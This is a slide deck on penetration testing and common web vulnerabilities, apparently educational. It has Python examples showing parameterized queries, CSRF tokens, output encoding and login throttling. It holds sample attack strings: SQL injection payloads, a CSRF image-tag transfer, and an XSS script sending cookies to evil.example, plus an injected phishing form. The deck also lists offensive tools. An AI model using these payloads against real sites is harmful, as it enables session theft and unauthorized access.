
Penetration Testing

"Protection of computer systems and data from digital threats."


Cyber Security

AGENDA

• Penetration Testing
• Popular Vulnerabilities:
▪ HTML Injection
▪ SQL Injection
▪ CSRF
▪ XSS
▪ Login Authentication

What is Penetration Testing

• Penetration testing, also known as pen testing, is an authorized, simulated attack that identifies exploitable vulnerabilities in systems, networks, or applications.
• It can be conducted manually or with automated tools; automated scanners find known issue classes, while manual testing is needed to chain findings and to assess business logic.
• The process involves agreeing the scope and rules of engagement, gathering information, finding entry points, attempting to breach them, and reporting findings with evidence and remediation advice.
• The main goal is to uncover and demonstrate security weaknesses before a real attacker does.

Penetration Testing Phases

[Figure: penetration testing phases diagram, not reproduced in this extract.]
Reference: https://www.extnoc.com/learn/general/penetration-testing

HTML Injection

• HTML Injection is a vulnerability in which user-supplied input is placed into a page's HTML without encoding, so an attacker can inject markup that alters the page's content or appearance.
• It is usually distinguished from Cross-Site Scripting (XSS) by impact: the injected markup renders but does not execute attacker-controlled script. If script execution is possible, the issue is classified as XSS.

Types:
• Stored: the injected markup is saved on the server (for example in a profile field or comment) and displayed to every user who views it.
• Reflected: the injected markup is echoed back only in the response to the request that carried it, so the victim must be lured into sending that request.

HTML Injection - Risks & Mitigation

• Risks:
• Content Manipulation: alters the page layout or text, misleading users (e.g. a fake "account suspended" notice).
• Phishing & Data Theft: an injected form that posts to an attacker's server tricks users into submitting credentials.
• Trust Exploitation: the content appears on a legitimate domain, so social engineering benefits from the site's reputation.

• Prevention:
• Output Encoding: encode user data for the context in which it is rendered (e.g. < becomes &lt;), so the browser treats it as text rather than markup. This is the primary defense.
• Input Validation: reject or normalize input that does not match what the field expects (type, length, character set); a defense-in-depth measure, not a replacement for encoding.
• CSP: a Content Security Policy does not stop injected markup from rendering, but it limits what the markup can do; for example, the form-action directive restricts where an injected form may submit.

SQL Injection

• SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL fragments are inserted into an entry field and end up executed by the database.
• It affects web applications that build SQL statements from user input and send them to a data repository.
• The attacker sends specially crafted input that changes the meaning of the SQL statement, causing it to bypass checks, return other users' data, or modify the database.

How SQL Injection Works

• The attacker is able to inject SQL through an existing application into the database engine.
• Publicly reachable input fields (login forms, search boxes, URL parameters, HTTP headers) are used as the entry point to the database.
• Instead of the expected data, the attacker enters SQL syntax such as a closing quote followed by OR 1=1 or a comment marker.
• Forms whose input is concatenated directly into a query string, rather than bound as a parameter, let the attacker rewrite the query.

How SQL Injection Works (continued)

• The application sends a form to the user.
• The attacker submits the form with SQL exploit data in one or more fields.
• The application builds a query string by concatenating the exploit data into SQL.
• The application sends the resulting SQL query to the database.
• The database executes the query, including the injected part, and returns the results to the application.
• The application returns data (or an error message that leaks query details) to the attacker.
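The sequence above, as an added example that is not part of the original slides: a login check built by string concatenation beside the parameterized version, run against an in-memory SQLite database. The schema, the two user rows and the payloads are constructed for illustration; passwords are stored in clear only so the query is readable (a real system compares password hashes).

```python
"""Vulnerable vs. parameterized login query (added example, constructed data)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway users table. Constructed sample rows, plaintext for readability only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "user"), ("admin", "Tr0ub4dor&3", "admin")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the query by concatenation: quotes in the input become SQL syntax."""
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the driver binds the values, so quotes stay data."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Constructed payloads.
# Closes the username literal and comments out the password check:
#   ... WHERE username = 'admin'-- ' AND password = 'wrong'
COMMENT_OUT = "admin'--"
# Classic tautology in the password field; AND binds tighter than OR, so the
# OR '1'='1' clause matches every row:
#   ... WHERE username = 'x' AND password = '' OR '1'='1'
TAUTOLOGY = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        # Attacker logs in as admin without the password.
        "forged_admin": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        # Attacker gets the first row of the table without knowing any account.
        "forged_any": login_vulnerable(conn, "x", TAUTOLOGY),
        # Same payloads against the parameterized query: treated as literal strings.
        "blocked_admin": login_safe(conn, COMMENT_OUT, "wrong"),
        "blocked_any": login_safe(conn, "x", TAUTOLOGY),
        # Legitimate login still works.
        "legit": login_safe(conn, "alice", "correct horse"),
    }
```

The fix is not to filter quotes out of the input but to stop treating input as SQL: with a bound parameter the database receives the statement and the values separately, so the string `admin'--` is compared, as a whole, against the username column.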

Defense Against SQL Injection

1. Parameterized queries (prepared statements): the primary defense. User data is passed to the database as a bound parameter and is never concatenated into the SQL string, so quotes and keywords in the input remain data.
2. Input validation: validate all user input against what the field should contain (type, length, allowed characters). This is defense in depth and does not replace parameterization, because legitimate data (an apostrophe in a surname) can contain SQL metacharacters.
3. Use a web application firewall: a popular example is the free, open-source module ModSecurity, which applies a continually updated rule set to filter potentially dangerous web requests. A WAF can be bypassed by encoding tricks, so treat it as an additional layer, not the fix.
Tools:
• sqlmap
• SQLsus
• SQLi Dumper

What is CSRF?
• CSRF, or Cross-Site Request Forgery, is a web security vulnerability that tricks a user's browser into sending requests to a website where the user is authenticated. It exploits the trust the website places in the browser's cookies: any request carrying the session cookie is treated as the user's.

• Goal of CSRF: attackers make authenticated users perform actions they did not intend, such as changing account settings, changing an email address or password, or making transactions.

How CSRF Works

Step-by-Step Process:
1. User Login: the user logs into a legitimate website (e.g., a banking site) and receives a session cookie.
2. Attacker's Trap: the attacker crafts a request to that site and embeds it in a malicious page, email, or link, then lures the user into opening it.
3. Request Sent: the user's browser, still holding the session cookie, sends the attacker's request to the legitimate site and attaches the cookie automatically, without the user realizing it.
4. Action Executed: the server processes the request, believing it came from the user, and performs the unintended action.
Example, bank transfer: an attacker sends a user a link to a page that triggers a transfer request; when the user opens it, money is moved from their account to the attacker's.

CSRF Example

• Scenario: Alice is logged into her banking site. Bob (the attacker) sends Alice a link to a page he controls.
• Malicious Code Example:
• <img src="http://bank.com/transfer?to=bob&amount=1000" style="display:none">

• As soon as Alice's browser loads Bob's page, it tries to fetch the "image"; no click is needed. The request goes to the bank with Alice's session cookie attached, and the bank transfers $1000 to Bob.

• The hidden image tag therefore issues a request on Alice's behalf, exploiting her authenticated session.

• The same technique works for any state-changing action reachable by a single request, such as deleting the user's account. When the target requires POST, the attacker's page contains a hidden form that a script submits automatically on load.

Preventing CSRF

Protection Techniques:
• CSRF Tokens: an unpredictable, per-session (or per-request) token embedded in every state-changing form and verified on the server. The attacker's page cannot read the token because of the same-origin policy, so forged requests fail the check.
• SameSite Cookies: setting SameSite=Lax or SameSite=Strict on the session cookie stops the browser from attaching it to cross-site requests, so a forged request arrives unauthenticated.
• Safe HTTP methods: state changes must require POST (or another non-idempotent method); a transfer triggered by GET is exploitable with nothing more than an image tag.
• User Confirmation: require re-authentication or an explicit confirmation step for sensitive actions.
Tools:
• Burp Suite
• XSRFProbe
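The token check and the cookie attribute described above, as an added example that is not code from the original slides. The request dictionaries stand in for a web framework's request object, and the session id, server secret and amounts are constructed.

```python
"""Synchronizer-token CSRF protection plus a SameSite session cookie (added example)."""
import hashlib
import hmac
import secrets

# Constructed for the demo; a real deployment loads this from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Derive the token from the session id with an HMAC. It needs no server-side
    storage, is bound to one session, and cannot be computed without the secret."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted: str) -> bool:
    """Constant-time comparison so the check does not leak the token byte by byte."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted)


def set_cookie_header(session_id: str) -> str:
    """Session cookie with SameSite so the browser omits it on cross-site requests."""
    return f"Set-Cookie: session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def handle_transfer(request: dict) -> str:
    """Server-side handler for /transfer. `request` is a constructed stand-in with
    keys 'method', 'cookies' and 'form'."""
    if request["method"] != "POST":
        return "405 state-changing actions require POST"
    session_id = request["cookies"].get("session")
    if not session_id:
        return "401 not logged in"
    if not verify_csrf(session_id, request["form"].get("csrf_token", "")):
        return "403 CSRF token missing or invalid"
    form = request["form"]
    return f"200 transferred {form['amount']} to {form['to']}"


def demo() -> dict:
    session = "sess-alice-1234"   # constructed session id
    # Form rendered by the bank for Alice; it carries the token the bank issued.
    legit = {"method": "POST", "cookies": {"session": session},
             "form": {"to": "carol", "amount": "50", "csrf_token": csrf_token(session)}}
    # Hidden form auto-submitted from the attacker's page. The browser still sends
    # Alice's cookie, but the attacker cannot read the token from the bank's page.
    forged_post = {"method": "POST", "cookies": {"session": session},
                   "form": {"to": "bob", "amount": "1000", "csrf_token": "guess"}}
    # The <img> tag from the slide: a GET with the cookie attached.
    img_get = {"method": "GET", "cookies": {"session": session},
               "form": {"to": "bob", "amount": "1000"}}
    return {
        "legit": handle_transfer(legit),
        "forged_post": handle_transfer(forged_post),
        "img_get": handle_transfer(img_get),
        "cookie": set_cookie_header(session),
    }
```

The two defenses are complementary: the SameSite attribute keeps the cookie off cross-site requests in current browsers, and the token check rejects any request that arrives with the cookie but without proof that it was produced by a page the server itself rendered.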

XSS

XSS (Cross-Site Scripting) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users, where the script runs with the page's origin.

Primary Goals of XSS:
• Data Theft: attackers use XSS to steal sensitive information such as cookies, session tokens, and other credentials.
• Session Hijacking: gain control over user sessions to impersonate the victim.
• Redirection: redirect users to malicious websites to perform further attacks.
Types of XSS

Stored XSS: the malicious script is saved on the server (in a database, comment field, etc.) and is delivered to users whenever they load the affected page.

Reflected XSS: the injected script is reflected off the web server, for example from a URL parameter or error message, in the response to the request that carried it. Often delivered through phishing links.

DOM-based XSS: the vulnerability exists in client-side script and does not involve server-side processing. Page JavaScript reads attacker-controlled data (e.g. from location.hash) and writes it into the DOM (Document Object Model) in a way that executes it directly in the user's browser.

How XSS Attacks Work

• Step 1: the attacker places a malicious script in an input field, URL parameter, or URL fragment.
• Step 2: the data is put into the page without proper output encoding.

o Stored XSS: the server saves the script. When other users visit the page, they unknowingly load it.
o Reflected XSS: the server echoes the injected script back immediately. The victim is affected if they follow the attacker's link or submit the attacker's form.
o DOM-based XSS: the server is not involved; client-side code inserts the attacker's data into the DOM, changing the page's content or behavior.

How XSS Attacks Work (continued)

• Step 3: the script runs in the victim's browser with the site's origin, allowing the attacker to read sensitive information (such as cookies not marked HttpOnly), perform actions as the victim, or redirect the victim to phishing or malware sites.

Tools:
• Burp Suite
• DalFox
• XSStrike

PREVENTION

• Encode Outputs (primary defense): convert data to a safe form for the context in which it is rendered before placing it on the page. In an HTML body, replace < with &lt; and > with &gt;; inside an attribute, also encode quotes; inside a URL, percent-encode and allow only expected schemes.
• Validate Inputs: check that user inputs (comments, form data, etc.) match what the field expects. Stripping characters like < and > alone is not sufficient: an attribute or JavaScript context can be broken out of without any angle brackets, and stripping damages legitimate input.
• Set Content Security Policies (CSP): use a CSP to control which scripts can run on the page and limit where they can be loaded from, so an injected inline script is blocked even if encoding was missed.
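Context-aware output encoding, serving both the HTML injection prevention slide earlier and the XSS prevention slide above, as an added example that is not code from the original slides. It renders a user comment into HTML, shows why stripping angle brackets fails in an attribute context, and includes a CSP header whose form-action directive limits what an injected form could do. The payloads, the author name and the page fragment are constructed.

```python
"""Context-aware output encoding for HTML body, attribute and URL contexts (added example)."""
import html
from urllib.parse import urlparse

# form-action confines where any form on the page (including an injected one) may post;
# script-src 'self' blocks inline scripts that slipped past encoding.
CSP_HEADER = (
    "Content-Security-Policy: default-src 'self'; script-src 'self'; "
    "object-src 'none'; base-uri 'none'; form-action 'self'"
)


def strip_angle_brackets(value: str) -> str:
    """The 'remove < and >' approach. Kept only to show its limits."""
    return value.replace("<", "").replace(">", "")


def naive_link(author: str) -> str:
    """Attribute context protected by bracket stripping: the breakout needs no brackets."""
    return '<a href="/profile" title="' + strip_angle_brackets(author) + '">profile</a>'


def safe_url(url: str) -> str:
    """URL context: allow only http(s) so javascript: and data: URLs are rejected,
    then HTML-encode the value because it lands inside an attribute."""
    if urlparse(url).scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_comment(author: str, body: str, homepage: str) -> str:
    """Each value is encoded for the exact context it is written into."""
    return (
        '<div class="comment">'
        f'<a href="{safe_url(homepage)}" title="{html.escape(author, quote=True)}">'
        f"{html.escape(author)}</a>: {html.escape(body)}"
        "</div>"
    )


# Constructed payloads.
XSS_BODY = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
HTML_INJECTION_BODY = (
    '<form action="http://evil.example/login">Session expired, sign in again: '
    '<input name="pw" type="password"></form>'
)
ATTRIBUTE_BREAKOUT = '" onmouseover="alert(1)'
JS_URL = "javascript:alert(document.cookie)"


def demo() -> dict:
    return {
        # Bracket stripping leaves the event handler intact.
        "naive": naive_link(ATTRIBUTE_BREAKOUT),
        # Same author string, plus script body and javascript: URL, all neutralized.
        "encoded": render_comment(ATTRIBUTE_BREAKOUT, XSS_BODY, JS_URL),
        # The HTML-injection phishing form renders as visible text, not as a form.
        "phishing_form": render_comment("mallory", HTML_INJECTION_BODY, "https://example.org"),
    }
```

Most template engines escape the HTML body context by default; the cases that go wrong in practice are values written into attributes, URLs and inline script, which is why the encoding function has to know which context it is writing into.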

Login Authentication

• A security process used to confirm the identity of a user before allowing access to digital resources, such as applications, accounts, or networks.

• Authentication verifies that users are who they claim to be. It acts as a gatekeeper, preventing unauthorized individuals from accessing sensitive systems and information, and is essential for protecting data and maintaining secure access to digital resources. It is distinct from authorization, which decides what an authenticated user may do.

Tools:
• Hydra (online password guessing against login services)
• Nikto (web server scanner, used to map the login surface)
• John the Ripper (offline cracking of captured password hashes)
Types of Authentication Methods
• Password-Based Authentication:
• The simplest and most common form of authentication.
• Users enter a secret password to gain access; security depends on password strength, on the server storing only salted, slow hashes, and on resistance to guessing attacks.

• Two-Factor Authentication (2FA):
• Adds a second factor of a different kind, such as a one-time code from an app or a hardware key, in addition to the password.
• Even if the password is compromised, the attacker still needs the second factor. Codes delivered by SMS or generated by an app can still be phished in real time, so phishing-resistant factors such as FIDO2/WebAuthn authenticators are stronger.

• Biometric Authentication:
• Uses unique biological traits (fingerprints, facial recognition) for identity verification.
• Hard to replicate, but a biometric cannot be changed if its template leaks, so it is normally combined with another factor.

• Multi-Factor Authentication (MFA):
• Combines two or more factors from different categories (something you know, have, or are), for example password + hardware key + fingerprint.
• Provides robust protection, especially for sensitive accounts and systems.
Common Vulnerabilities & Mitigations
• Common Vulnerabilities:
• Weak Passwords: users often choose short, guessable, or reused passwords.
• Phishing Attacks: fake emails or sites trick users into entering their credentials.
• Brute-Force and Credential Stuffing: attackers use software to guess passwords repeatedly, or replay username/password pairs leaked from other sites.
• Session Hijacking: attackers steal or intercept a user's session ID to impersonate them.
• Mitigation Strategies:
• Enforce Strong Password Policies: require adequate length, check new passwords against known-breached lists, and store them with a salted, slow hash (bcrypt, scrypt, Argon2, or PBKDF2).
• Use Two-Factor or Multi-Factor Authentication: adds layers so a stolen password alone is not enough.
• Implement Rate Limiting, CAPTCHA and Lockouts: CAPTCHA slows automated tooling, and temporary lockouts or progressive delays defeat brute force. Permanent lockouts let an attacker deny service to a victim by guessing wrong on purpose, so keep them time-limited and rate-limit per source as well as per account.
• Educate Users on Phishing: train users to spot fake emails and login pages to avoid credential theft.
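The brute-force mitigations above, as an added example that is not code from the original slides: salted PBKDF2 password hashing, a sliding window of failed attempts per account, a time-limited lockout, and a dummy hash comparison so unknown usernames take as long to reject as known ones. The user store, the clock and the attempt sequence are constructed; the iteration count is lowered for demo speed.

```python
"""Login throttling with time-limited lockout and salted password hashing (added example)."""
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

MAX_FAILURES = 5      # failures allowed within WINDOW before the account locks
WINDOW = 300.0        # seconds over which failures are counted
LOCKOUT = 900.0       # seconds the account stays locked
# Lowered for demo speed; OWASP recommends 600,000 for PBKDF2-HMAC-SHA256 in production.
PBKDF2_ITERATIONS = 50_000


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Return (salt, digest). A fresh random salt is generated when none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


class Authenticator:
    def __init__(self, now=time.time):
        self.now = now                         # injectable clock for testing
        self.users = {}                        # username -> (salt, digest)
        self.failures = defaultdict(deque)     # username -> timestamps of recent failures
        self.locked_until = {}                 # username -> unlock time
        # Compared against when the username is unknown, so timing does not
        # reveal which accounts exist.
        self._dummy = hash_password("dummy-password-for-unknown-users")

    def add_user(self, username: str, password: str) -> None:
        self.users[username] = hash_password(password)

    def login(self, username: str, password: str) -> str:
        """Return 'ok', 'denied' or 'locked'."""
        t = self.now()
        if self.locked_until.get(username, 0.0) > t:
            return "locked"            # correct password does not unlock early
        record = self.users.get(username)
        salt, digest = record if record else self._dummy
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
        if hmac.compare_digest(candidate, digest) and record is not None:
            self.failures.pop(username, None)
            return "ok"
        window = self.failures[username]
        window.append(t)
        while window and window[0] < t - WINDOW:   # drop failures outside the window
            window.popleft()
        if len(window) >= MAX_FAILURES:
            self.locked_until[username] = t + LOCKOUT
            window.clear()
            return "locked"
        return "denied"


def demo() -> list:
    """Five wrong guesses one second apart, then the right password during and after lockout."""
    clock = [1_000_000.0]                      # constructed clock
    auth = Authenticator(now=lambda: clock[0])
    auth.add_user("alice", "correct horse battery staple")
    results = []
    for guess in ["password", "123456", "qwerty", "letmein", "alice1"]:
        results.append(auth.login("alice", guess))
        clock[0] += 1
    results.append(auth.login("alice", "correct horse battery staple"))  # still locked
    clock[0] += LOCKOUT + 1
    results.append(auth.login("alice", "correct horse battery staple"))  # lockout expired
    return results
```

Because the lockout is keyed by account, an attacker who knows a victim's username can lock them out on purpose; production systems pair this with per-source rate limits and, often, with progressive delays instead of hard locks so the victim's own login still works.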
References

• https://owasp.org/www-project-top-ten/
• https://www.infosecinstitute.com/resources/application-security/best-free-and-open-source-sql-injection-tools/ext
• https://www.esecurityplanet.com/
• https://www.imperva.com/learn/application-security/html-injection/
• https://portswigger.net/web-security/csrf
• https://www.acunetix.com/websitesecurity/csrf-attacks/
• https://portswigger.net/web-security/cross-site-scripting
• https://portswigger.net/web-security/authentication
Thank You!
